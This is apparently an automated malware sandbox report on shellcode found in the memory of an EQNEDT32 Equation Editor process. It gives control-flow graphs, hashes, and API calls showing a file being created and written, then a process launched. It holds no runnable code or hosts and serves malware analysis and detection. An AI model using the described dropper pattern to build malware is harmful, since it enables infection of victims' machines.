                                                                                              • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CreateExit
                                                                                              • String ID:
                                                                                              • API String ID: 126409537-0
                                                                                              • Opcode ID: ab6099e50a1536c03818295e56c65e109917f17f6d534d6b5d930f748458d395
                                                                                              • Instruction ID: 4d8bf9bfd2ec818fe763e218ee3b3d5b86708ad41ae8e4484a93954fed5d5631
                                                                                              • Opcode Fuzzy Hash: ab6099e50a1536c03818295e56c65e109917f17f6d534d6b5d930f748458d395
                                                                                              • Instruction Fuzzy Hash: 8701D6B680C34169DB11E764AC81AAEB76DFFC0300F08AD09A1968B0B6DA70C0159BE5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 470 356060f-3560617 call 3560622 474 356067e-356068e call 3560692 470->474 475 3560619-356061a 470->475 479 3560695-35606ca call 35606b9 474->479 477 3560681-356068e 475->477 478 356061c-3560657 CreateFileW call 3560659 475->478 477->479 486 3560731 479->486 487 35606cc-35606ce 479->487 489 3560757-3560765 call 356076e 486->489 490 3560733-356073f call 3560752 486->490 491 3560746-3560747 487->491 492 35606d1 487->492 515 3560767 489->515 516 35607d0-35607f7 WriteFile 489->516 509 35607b5 490->509 519 3560741 490->519 495 3560748-356074a 491->495 497 35607ae-35607af 491->497 494 35606d4-35606df 492->494 492->495 500 35606e6-356071a 494->500 501 35606e1 call 35606f8 494->501 502 356074d-356074f 495->502 498 35607b1 497->498 498->509 511 3560792 500->511 512 356071d 500->512 501->500 507 35607b6-35607c2 502->507 508 3560751-3560755 502->508 520 35607c4-35607c9 507->520 521 35607f9-356080b call 356080d 507->521 508->489 509->507 524 3560795-35607a9 call 35607ac 511->524 517 3560794 512->517 518 3560720-3560747 call 3560752 512->518 522 35607ce 515->522 523 3560769-3560772 515->523 516->498 517->524 518->497 540 3560749-356074a 518->540 519->524 525 3560743 519->525 520->516 526 35607cb 520->526 541 356080f-356081e call 356082a 521->541 522->516 538 356080c 524->538 539 35607ab 524->539 525->491 526->522 538->541 539->497 540->502 546 3560820 541->546 547 3560881-3560885 541->547 548 3560896-3560899 546->548 549 3560822 546->549 550 3560887-356088c ExitProcess 547->550 553 356089c-356089e 548->553 551 3560894 549->551 552 3560824-356083d call 356084b 549->552 551->548 562 35608a4-35608a6 call 35608b6 552->562 563 356083f-3560840 552->563 555 35608a1-35608ad call 35608b6 553->555 555->553 561 35608af-35608b3 555->561 565 35608a7-35608ad 562->565 563->565 566 3560842-3560843 563->566 565->553 565->561 567 35608b4 566->567 568 3560845-3560848 566->568 568->555 569 356084a-356087c CreateProcessW call 3560887 568->569 572 35608e7-35608eb 569->572 573 356087e 569->573 574 35608ef 572->574 575 35608ed 572->575 576 35608d0 573->576 577 3560880 573->577 579 35608f1-35608f3 574->579 582 35608f5-35608fe 574->582 575->579 580 35608d2-35608d6 576->580 581 35608d8-35608dc 576->581 578 3560882-3560885 577->578 577->579 578->550 583 3560903-3560904 579->583 580->581 585 35608e4 580->585 581->579 586 35608de-35608e2 581->586 587 35608c7-35608ca 582->587 588 3560900 582->588 585->572 586->579 586->585 587->582 589 35608cc 587->589 588->583 589->576
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 2e77069eac62d2ee9bc9a9e2877012538082cd9b668af7dba8a5dc31d499417e
                                                                                              • Instruction ID: d4c47903a70453b8e58b98a18fb0b8ea88a8b557e49151f3adc68078b7a2b1f7
                                                                                              • Opcode Fuzzy Hash: 2e77069eac62d2ee9bc9a9e2877012538082cd9b668af7dba8a5dc31d499417e
                                                                                              • Instruction Fuzzy Hash: 9D41AA3044D3C12EDA12E7249D6AB59BF74BF83600F1984CEE1814F1F3E69556059766
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 590 35606b9-35606ca call 35606d5 594 3560731 590->594 595 35606cc-35606ce 590->595 596 3560757-3560765 call 356076e 594->596 597 3560733-3560736 call 3560752 594->597 598 3560746-3560747 595->598 599 35606d1 595->599 620 3560767 596->620 621 35607d0-35607f7 WriteFile 596->621 618 3560737-356073f 597->618 601 3560748-356074a 598->601 602 35607ae-35607af 598->602 600 35606d4-35606df 599->600 599->601 605 35606e6-356071a 600->605 606 35606e1 call 35606f8 600->606 607 356074d-356074f 601->607 603 35607b1 602->603 614 35607b5 603->614 616 3560792 605->616 617 356071d 605->617 606->605 612 35607b6 607->612 613 3560751-3560755 607->613 619 35607bc-35607c2 612->619 613->596 614->612 629 3560795-35607a9 call 35607ac 616->629 622 3560794 617->622 623 3560720-3560730 617->623 618->614 624 3560741 618->624 625 35607c4-35607c9 619->625 626 35607f9-356080b call 356080d 619->626 627 35607ce 620->627 628 3560769-3560772 620->628 621->603 622->629 633 3560736-3560747 call 3560752 623->633 624->629 630 3560743 624->630 625->621 631 35607cb 625->631 646 356080f-356081e call 356082a 626->646 627->621 643 356080c 629->643 644 35607ab 629->644 630->598 631->627 633->602 645 3560749-356074a 633->645 643->646 644->602 645->607 651 3560820 646->651 652 3560881-3560885 646->652 653 3560896-3560899 651->653 654 3560822 651->654 655 3560887-356088c ExitProcess 652->655 658 356089c-356089e 653->658 656 3560894 654->656 657 3560824-356083d call 356084b 654->657 656->653 667 35608a4-35608a6 call 35608b6 657->667 668 356083f-3560840 657->668 660 35608a1-35608ad call 35608b6 658->660 660->658 666 35608af-35608b3 660->666 670 35608a7-35608ad 667->670 668->670 671 3560842-3560843 668->671 670->658 670->666 672 35608b4 671->672 673 3560845-3560848 671->673 673->660 674 356084a-3560876 CreateProcessW call 3560887 673->674 676 356087b-356087c 674->676 677 35608e7-35608eb 676->677 678 356087e 676->678 679 35608ef 677->679 680 35608ed 677->680 681 35608d0 678->681 682 3560880 678->682 684 35608f1-35608f3 679->684 687 35608f5-35608fe 679->687 680->684 685 35608d2-35608d6 681->685 686 35608d8-35608dc 681->686 683 3560882-3560885 682->683 682->684 683->655 688 3560903-3560904 684->688 685->686 690 35608e4 685->690 686->684 691 35608de-35608e2 686->691 692 35608c7-35608ca 687->692 693 3560900 687->693 690->677 691->684 691->690 692->687 694 35608cc 692->694 693->688 694->681
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6ed8813cd8f9cf3f9bf7e7c2c0d1d1f913b80d6dabad10ef7eb689727f7d9572
                                                                                              • Instruction ID: e60ecefddac4d2af7318f0e47d2117c34a8ee834c59491efb256e34c07da580d
                                                                                              • Opcode Fuzzy Hash: 6ed8813cd8f9cf3f9bf7e7c2c0d1d1f913b80d6dabad10ef7eb689727f7d9572
                                                                                              • Instruction Fuzzy Hash: F831E83044C3C66FD712EB649D41B6ABF79BFC2600F18898EF1814B1F2E7659609CB66
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 695 3560659-356066a LoadLibraryW call 356066e 698 35606d1 695->698 699 356066c-35606ca call 3560692 call 35606b9 695->699 700 35606d4-35606df 698->700 701 3560748-356074a 698->701 739 3560731 699->739 740 35606cc-35606ce 699->740 703 35606e6-356071a 700->703 704 35606e1 call 35606f8 700->704 705 356074d-356074f 701->705 710 3560792 703->710 711 356071d 703->711 704->703 708 35607b6 705->708 709 3560751-3560755 705->709 714 35607bc-35607c2 708->714 713 3560757-3560765 call 356076e 709->713 720 3560795-35607a9 call 35607ac 710->720 715 3560794 711->715 716 3560720-3560730 711->716 724 35607d0-35607f7 WriteFile 713->724 736 3560767 713->736 718 35607c4-35607c9 714->718 719 35607f9-356080b call 356080d 714->719 715->720 726 3560736-3560747 call 3560752 716->726 718->724 725 35607cb 718->725 750 356080f-356081e call 356082a 719->750 742 356080c 720->742 743 35607ab 720->743 751 35607b1 724->751 731 35607ce 725->731 744 35607ae-35607af 726->744 748 3560749-356074a 726->748 731->724 736->731 745 3560769-3560772 736->745 739->713 746 3560733-3560736 call 3560752 739->746 740->698 749 3560746-3560747 740->749 742->750 743->744 744->751 758 3560737-356073f 746->758 748->705 749->701 749->744 762 3560820 750->762 763 3560881-3560885 750->763 755 35607b5 751->755 755->708 758->755 761 3560741 758->761 761->720 764 3560743 761->764 765 3560896-3560899 762->765 766 3560822 762->766 767 3560887-356088c ExitProcess 763->767 764->749 770 356089c-356089e 765->770 768 3560894 766->768 769 3560824-356083d call 356084b 766->769 768->765 779 35608a4-35608a6 call 35608b6 769->779 780 356083f-3560840 769->780 772 35608a1-35608ad call 35608b6 770->772 772->770 778 35608af-35608b3 772->778 782 35608a7-35608ad 779->782 780->782 783 3560842-3560843 780->783 782->770 782->778 784 35608b4 783->784 785 3560845-3560848 783->785 785->772 786 356084a-3560876 CreateProcessW call 3560887 785->786 788 356087b-356087c 786->788 789 35608e7-35608eb 788->789 790 356087e 788->790 791 35608ef 789->791 792 35608ed 789->792 793 35608d0 790->793 794 3560880 790->794 796 35608f1-35608f3 791->796 799 35608f5-35608fe 791->799 792->796 797 35608d2-35608d6 793->797 798 35608d8-35608dc 793->798 795 3560882-3560885 794->795 794->796 795->767 800 3560903-3560904 796->800 797->798 802 35608e4 797->802 798->796 803 35608de-35608e2 798->803 804 35608c7-35608ca 799->804 805 3560900 799->805 802->789 803->796 803->802 804->799 806 35608cc 804->806 805->800 806->793
                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(03560649), ref: 03560659
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: dfcc696a0fb49f4d3319febbc088d39d5c06691e0b131808d8af0196e0dbcac0
                                                                                              • Instruction ID: 2da45d6d2a46feef36c14ed958f1c4b73bca9f3153f2007c97633e06c3334665
                                                                                              • Opcode Fuzzy Hash: dfcc696a0fb49f4d3319febbc088d39d5c06691e0b131808d8af0196e0dbcac0
                                                                                              • Instruction Fuzzy Hash: 4431E02044D3C62ECB12E7349E5AB5ABF74BF83600F1884CEE1820F1F3EA955605D726
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 807 3560705-356071a call 3560721 811 3560792 807->811 812 356071d 807->812 815 3560795-35607a9 call 35607ac 811->815 813 3560794 812->813 814 3560720-3560730 812->814 813->815 816 3560736-3560747 call 3560752 814->816 821 356080c 815->821 822 35607ab 815->822 823 35607ae-35607af 816->823 824 3560749-356074f 816->824 825 356080f-356081e call 356082a 821->825 822->823 826 35607b1-35607b5 823->826 828 35607b6 824->828 829 3560751-3560765 call 356076e 824->829 841 3560820 825->841 842 3560881-3560885 825->842 826->828 834 35607bc-35607c2 828->834 843 35607d0-35607f7 WriteFile 829->843 852 3560767 829->852 837 35607c4-35607c9 834->837 838 35607f9-356080b call 356080d 834->838 837->843 844 35607cb 837->844 838->825 847 3560896-3560899 841->847 848 3560822 841->848 850 3560887-356088c ExitProcess 842->850 843->826 849 35607ce 844->849 855 356089c-356089e 847->855 853 3560894 848->853 854 3560824-356083d call 356084b 848->854 849->843 852->849 858 3560769-3560772 852->858 853->847 869 35608a4-35608a6 call 35608b6 854->869 870 356083f-3560840 854->870 860 35608a1-35608ad call 35608b6 855->860 860->855 868 35608af-35608b3 860->868 872 35608a7-35608ad 869->872 870->872 873 3560842-3560843 870->873 872->855 872->868 874 35608b4 873->874 875 3560845-3560848 873->875 875->860 876 356084a-3560876 CreateProcessW call 3560887 875->876 878 356087b-356087c 876->878 879 35608e7-35608eb 878->879 880 356087e 878->880 881 35608ef 879->881 882 35608ed 879->882 883 35608d0 880->883 884 3560880 880->884 886 35608f1-35608f3 881->886 889 35608f5-35608fe 881->889 882->886 887 35608d2-35608d6 883->887 888 35608d8-35608dc 883->888 885 3560882-3560885 884->885 884->886 885->850 890 3560903-3560904 886->890 887->888 892 35608e4 887->892 888->886 893 35608de-35608e2 888->893 894 35608c7-35608ca 889->894 895 3560900 889->895 892->879 893->886 893->892 894->889 896 35608cc 894->896 895->890 896->883
                                                                                              APIs
                                                                                              • WriteFile.KERNELBASE(035606E6,035606FD,00000000,00000000,00000000,?,035606FD,035606E6,00000000,00000000,00000000,00000000,0356069F,00000050,00000000), ref: 035607F5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3934441357-0
                                                                                              • Opcode ID: e52008649e949c67fc193a14be535757e52065788752b6a9b4a718ad1f39f738
                                                                                              • Instruction ID: fe94482e7e1a36eb2f395879dcdadea22f85389d1ea748e9f92d795eb0e883e1
                                                                                              • Opcode Fuzzy Hash: e52008649e949c67fc193a14be535757e52065788752b6a9b4a718ad1f39f738
                                                                                              • Instruction Fuzzy Hash: 9321803040C3866EDB11EB54DD81B6FBBBAFFC1A00F149D5CB1924B0F2EB7596098A65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 897 3560593-35605a1 call 3560907 call 35605af 902 35605f4-3560617 897->902 903 35605a4-35605a9 897->903 906 356067e-356068e call 3560692 902->906 907 3560619-356061a 902->907 908 3560611-3560617 call 3560622 903->908 909 35605ac-35605c6 903->909 915 3560695-35606ca call 35606b9 906->915 911 3560681-356068e 907->911 912 356061c-3560632 907->912 908->906 908->907 917 3560637-3560644 CreateFileW call 3560659 909->917 923 35605c8-35605ce 909->923 911->915 912->917 927 3560731 915->927 928 35606cc-35606ce 915->928 925 3560649-3560657 917->925 930 3560642 923->930 931 35605d0-35605f3 call 356060f 923->931 932 3560757-3560765 call 356076e 927->932 933 3560733-356073f call 3560752 927->933 934 3560746-3560747 928->934 935 35606d1 928->935 930->925 938 3560644 call 3560659 930->938 931->902 962 3560767 932->962 963 35607d0-35607f7 WriteFile 932->963 956 35607b5 933->956 966 3560741 933->966 940 3560748-356074a 934->940 942 35607ae-35607af 934->942 939 35606d4-35606df 935->939 935->940 938->925 946 35606e6-356071a 939->946 947 35606e1 call 35606f8 939->947 948 356074d-356074f 940->948 943 35607b1 942->943 943->956 958 3560792 946->958 959 356071d 946->959 947->946 954 35607b6-35607c2 948->954 955 3560751-3560755 948->955 967 35607c4-35607c9 954->967 968 35607f9-356080b call 356080d 954->968 955->932 956->954 971 3560795-35607a9 call 35607ac 958->971 964 3560794 959->964 965 3560720-3560747 call 3560752 959->965 969 35607ce 962->969 970 3560769-3560772 962->970 963->943 964->971 965->942 987 3560749-356074a 965->987 966->971 972 3560743 966->972 967->963 973 35607cb 967->973 988 356080f-356081e call 356082a 968->988 969->963 985 356080c 971->985 986 35607ab 971->986 972->934 973->969 985->988 986->942 987->948 993 3560820 988->993 994 3560881-3560885 988->994 995 3560896-3560899 993->995 996 3560822 993->996 997 3560887-356088c ExitProcess 994->997 1000 356089c-356089e 995->1000 998 3560894 996->998 999 3560824-356083d call 356084b 996->999 998->995 1009 35608a4-35608a6 call 35608b6 999->1009 1010 356083f-3560840 999->1010 1002 35608a1-35608ad call 35608b6 1000->1002 1002->1000 1008 35608af-35608b3 1002->1008 1012 35608a7-35608ad 1009->1012 1010->1012 1013 3560842-3560843 1010->1013 1012->1000 1012->1008 1014 35608b4 1013->1014 1015 3560845-3560848 1013->1015 1015->1002 1016 356084a-356087c CreateProcessW call 3560887 1015->1016 1019 35608e7-35608eb 1016->1019 1020 356087e 1016->1020 1021 35608ef 1019->1021 1022 35608ed 1019->1022 1023 35608d0 1020->1023 1024 3560880 1020->1024 1026 35608f1-35608f3 1021->1026 1029 35608f5-35608fe 1021->1029 1022->1026 1027 35608d2-35608d6 1023->1027 1028 35608d8-35608dc 1023->1028 1025 3560882-3560885 1024->1025 1024->1026 1025->997 1030 3560903-3560904 1026->1030 1027->1028 1032 35608e4 1027->1032 1028->1026 1033 35608de-35608e2 1028->1033 1034 35608c7-35608ca 1029->1034 1035 3560900 1029->1035 1032->1019 1033->1026 1033->1032 1034->1029 1036 35608cc 1034->1036 1035->1030 1036->1023
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 4f4764238bdb60619fe3c07e41298d6882f46444732627a3ff3e30a6068b7b05
                                                                                              • Instruction ID: 625780c7ceb878a7e7280ab1e34964135dc959c7d10177b767ca822a6a8e52a0
                                                                                              • Opcode Fuzzy Hash: 4f4764238bdb60619fe3c07e41298d6882f46444732627a3ff3e30a6068b7b05
                                                                                              • Instruction Fuzzy Hash: 422130B588C3C05FD322D7706EAA791BF64BBE2604F1D86CE80C14F1F3D295900A9396
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1037 35605af-35605c6 call 3560907 call 35605d6 1044 3560637-3560644 CreateFileW call 3560659 1037->1044 1045 35605c8-35605ce 1037->1045 1050 3560649-3560657 1044->1050 1048 3560642 1045->1048 1049 35605d0-3560617 call 356060f 1045->1049 1048->1050 1052 3560644 call 3560659 1048->1052 1060 356067e-356068e call 3560692 1049->1060 1061 3560619-356061a 1049->1061 1052->1050 1065 3560695-35606ca call 35606b9 1060->1065 1063 3560681-356068e 1061->1063 1064 356061c-3560632 1061->1064 1063->1065 1064->1044 1069 3560731 1065->1069 1070 35606cc-35606ce 1065->1070 1071 3560757-3560765 call 356076e 1069->1071 1072 3560733-356073f call 3560752 1069->1072 1073 3560746-3560747 1070->1073 1074 35606d1 1070->1074 1095 3560767 1071->1095 1096 35607d0-35607f7 WriteFile 1071->1096 1089 35607b5 1072->1089 1099 3560741 1072->1099 1076 3560748-356074a 1073->1076 1077 35607ae-35607af 1073->1077 1075 35606d4-35606df 1074->1075 1074->1076 1080 35606e6-356071a 1075->1080 1081 35606e1 call 35606f8 1075->1081 1082 356074d-356074f 1076->1082 1078 35607b1 1077->1078 1078->1089 1091 3560792 1080->1091 1092 356071d 1080->1092 1081->1080 1087 35607b6-35607c2 1082->1087 1088 3560751-3560755 1082->1088 1100 35607c4-35607c9 1087->1100 1101 35607f9-356080b call 356080d 1087->1101 1088->1071 1089->1087 1104 3560795-35607a9 call 35607ac 1091->1104 1097 3560794 1092->1097 1098 3560720-3560747 call 3560752 1092->1098 1102 35607ce 1095->1102 1103 3560769-3560772 1095->1103 1096->1078 1097->1104 1098->1077 1120 3560749-356074a 1098->1120 1099->1104 1105 3560743 1099->1105 1100->1096 1106 35607cb 1100->1106 1121 356080f-356081e call 356082a 1101->1121 1102->1096 1118 356080c 1104->1118 1119 35607ab 1104->1119 1105->1073 1106->1102 1118->1121 1119->1077 1120->1082 1126 3560820 1121->1126 1127 3560881-3560885 1121->1127 1128 3560896-3560899 1126->1128 1129 3560822 1126->1129 1130 3560887-356088c ExitProcess 1127->1130 1133 356089c-356089e 1128->1133 1131 3560894 1129->1131 1132 3560824-356083d call 356084b 1129->1132 1131->1128 1142 35608a4-35608a6 call 35608b6 1132->1142 1143 356083f-3560840 1132->1143 1135 35608a1-35608ad call 35608b6 1133->1135 1135->1133 1141 35608af-35608b3 1135->1141 1145 35608a7-35608ad 1142->1145 1143->1145 1146 3560842-3560843 1143->1146 1145->1133 1145->1141 1147 35608b4 1146->1147 1148 3560845-3560848 1146->1148 1148->1135 1149 356084a-356087c CreateProcessW call 3560887 1148->1149 1152 35608e7-35608eb 1149->1152 1153 356087e 1149->1153 1154 35608ef 1152->1154 1155 35608ed 1152->1155 1156 35608d0 1153->1156 1157 3560880 1153->1157 1159 35608f1-35608f3 1154->1159 1162 35608f5-35608fe 1154->1162 1155->1159 1160 35608d2-35608d6 1156->1160 1161 35608d8-35608dc 1156->1161 1158 3560882-3560885 1157->1158 1157->1159 1158->1130 1163 3560903-3560904 1159->1163 1160->1161 1165 35608e4 1160->1165 1161->1159 1166 35608de-35608e2 1161->1166 1167 35608c7-35608ca 1162->1167 1168 3560900 1162->1168 1165->1152 1166->1159 1166->1165 1167->1162 1169 35608cc 1167->1169 1168->1163 1169->1156
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: c64e5c60e4163fa49a930f622133e3bd2799c8b2d2f2680db5a4346b252ae6f1
                                                                                              • Instruction ID: 34c98720a6bf1ced9a34616cb55ed6e0dfd00659824f8939d9af8bc0f06dda85
                                                                                              • Opcode Fuzzy Hash: c64e5c60e4163fa49a930f622133e3bd2799c8b2d2f2680db5a4346b252ae6f1
                                                                                              • Instruction Fuzzy Hash: 9D1133B948C3C10FD322D7303EAE781BF64BB92504F0E868E81C54F1F3D29091069296
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1170 3560721-3560747 call 3560752 1175 35607ae-35607af 1170->1175 1176 3560749-356074f 1170->1176 1177 35607b1-35607b5 1175->1177 1179 35607b6-35607c2 1176->1179 1180 3560751-3560765 call 356076e 1176->1180 1177->1179 1184 35607c4-35607c9 1179->1184 1185 35607f9-356081e call 356080d call 356082a 1179->1185 1188 35607d0-35607f7 WriteFile 1180->1188 1194 3560767 1180->1194 1184->1188 1189 35607cb 1184->1189 1205 3560820 1185->1205 1206 3560881-3560885 1185->1206 1188->1177 1192 35607ce 1189->1192 1192->1188 1194->1192 1197 3560769-3560772 1194->1197 1207 3560896-3560899 1205->1207 1208 3560822 1205->1208 1209 3560887-356088c ExitProcess 1206->1209 1212 356089c-356089e 1207->1212 1210 3560894 1208->1210 1211 3560824-356083d call 356084b 1208->1211 1210->1207 1221 35608a4-35608a6 call 35608b6 1211->1221 1222 356083f-3560840 1211->1222 1214 35608a1-35608ad call 35608b6 1212->1214 1214->1212 1220 35608af-35608b3 1214->1220 1224 35608a7-35608ad 1221->1224 1222->1224 1225 3560842-3560843 1222->1225 1224->1212 1224->1220 1226 35608b4 1225->1226 1227 3560845-3560848 1225->1227 1227->1214 1228 356084a-3560876 CreateProcessW call 3560887 1227->1228 1230 356087b-356087c 1228->1230 1231 35608e7-35608eb 1230->1231 1232 356087e 1230->1232 1233 35608ef 1231->1233 1234 35608ed 1231->1234 1235 35608d0 1232->1235 1236 3560880 1232->1236 1238 35608f1-35608f3 1233->1238 1241 35608f5-35608fe 1233->1241 1234->1238 1239 35608d2-35608d6 1235->1239 1240 35608d8-35608dc 1235->1240 1237 3560882-3560885 1236->1237 1236->1238 1237->1209 1242 3560903-3560904 1238->1242 1239->1240 1244 35608e4 1239->1244 1240->1238 1245 35608de-35608e2 1240->1245 1246 35608c7-35608ca 1241->1246 1247 3560900 1241->1247 1244->1231 1245->1238 1245->1244 1246->1241 1248 35608cc 1246->1248 1247->1242 1248->1235
                                                                                              APIs
                                                                                              • WriteFile.KERNELBASE(035606E6,035606FD,00000000,00000000,00000000,?,035606FD,035606E6,00000000,00000000,00000000,00000000,0356069F,00000050,00000000), ref: 035607F5
                                                                                              • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0356083C,?,0356081A), ref: 03560874
                                                                                              • ExitProcess.KERNELBASE(00000000,?,0356087B,?,0356083C,?,0356081A,?,?,03560801,00000000,00000000,00000000,00000000,0356069F,00000050), ref: 0356088C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CreateExitFileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3739231918-0
                                                                                              • Opcode ID: efe35d33fb53c262e8aff48a2b14a8252caba624d41dc55ac144238288ad08bd
                                                                                              • Instruction ID: efd2faa1ce88542c4f4fb160bd14790c6e881a94b1ad891abf34ab45479d56d0
                                                                                              • Opcode Fuzzy Hash: efe35d33fb53c262e8aff48a2b14a8252caba624d41dc55ac144238288ad08bd
                                                                                              • Instruction Fuzzy Hash: 9D115E3000C34A6ED711EE14DD41FABBBBAFBC0B00F148D1CB191470B1EB7199498BA6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1249 35605d6-3560617 call 356060f 1255 356067e-356068e call 3560692 1249->1255 1256 3560619-356061a 1249->1256 1260 3560695-35606ca call 35606b9 1255->1260 1258 3560681-356068e 1256->1258 1259 356061c-3560657 CreateFileW call 3560659 1256->1259 1258->1260 1267 3560731 1260->1267 1268 35606cc-35606ce 1260->1268 1270 3560757-3560765 call 356076e 1267->1270 1271 3560733-356073f call 3560752 1267->1271 1272 3560746-3560747 1268->1272 1273 35606d1 1268->1273 1296 3560767 1270->1296 1297 35607d0-35607f7 WriteFile 1270->1297 1290 35607b5 1271->1290 1300 3560741 1271->1300 1276 3560748-356074a 1272->1276 1278 35607ae-35607af 1272->1278 1275 35606d4-35606df 1273->1275 1273->1276 1281 35606e6-356071a 1275->1281 1282 35606e1 call 35606f8 1275->1282 1283 356074d-356074f 1276->1283 1279 35607b1 1278->1279 1279->1290 1292 3560792 1281->1292 1293 356071d 1281->1293 1282->1281 1288 35607b6-35607c2 1283->1288 1289 3560751-3560755 1283->1289 1301 35607c4-35607c9 1288->1301 1302 35607f9-356080b call 356080d 1288->1302 1289->1270 1290->1288 1305 3560795-35607a9 call 35607ac 1292->1305 1298 3560794 1293->1298 1299 3560720-3560747 call 3560752 1293->1299 1303 35607ce 1296->1303 1304 3560769-3560772 1296->1304 1297->1279 1298->1305 1299->1278 1321 3560749-356074a 1299->1321 1300->1305 1306 3560743 1300->1306 1301->1297 1307 35607cb 1301->1307 1322 356080f-356081e call 356082a 1302->1322 1303->1297 1319 356080c 1305->1319 1320 35607ab 1305->1320 1306->1272 1307->1303 1319->1322 1320->1278 1321->1283 1327 3560820 1322->1327 1328 3560881-3560885 1322->1328 1329 3560896-3560899 1327->1329 1330 3560822 1327->1330 1331 3560887-356088c ExitProcess 1328->1331 1334 356089c-356089e 1329->1334 1332 3560894 1330->1332 1333 3560824-356083d call 356084b 1330->1333 1332->1329 1343 35608a4-35608a6 call 35608b6 1333->1343 1344 356083f-3560840 1333->1344 1336 35608a1-35608ad call 35608b6 1334->1336 1336->1334 1342 35608af-35608b3 1336->1342 1346 35608a7-35608ad 1343->1346 1344->1346 1347 3560842-3560843 1344->1347 1346->1334 1346->1342 1348 35608b4 1347->1348 1349 3560845-3560848 1347->1349 1349->1336 1350 356084a-356087c CreateProcessW call 3560887 1349->1350 1353 35608e7-35608eb 1350->1353 1354 356087e 1350->1354 1355 35608ef 1353->1355 1356 35608ed 1353->1356 1357 35608d0 1354->1357 1358 3560880 1354->1358 1360 35608f1-35608f3 1355->1360 1363 35608f5-35608fe 1355->1363 1356->1360 1361 35608d2-35608d6 1357->1361 1362 35608d8-35608dc 1357->1362 1359 3560882-3560885 1358->1359 1358->1360 1359->1331 1364 3560903-3560904 1360->1364 1361->1362 1366 35608e4 1361->1366 1362->1360 1367 35608de-35608e2 1362->1367 1368 35608c7-35608ca 1363->1368 1369 3560900 1363->1369 1366->1353 1367->1360 1367->1366 1368->1363 1370 35608cc 1368->1370 1369->1364 1370->1357
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
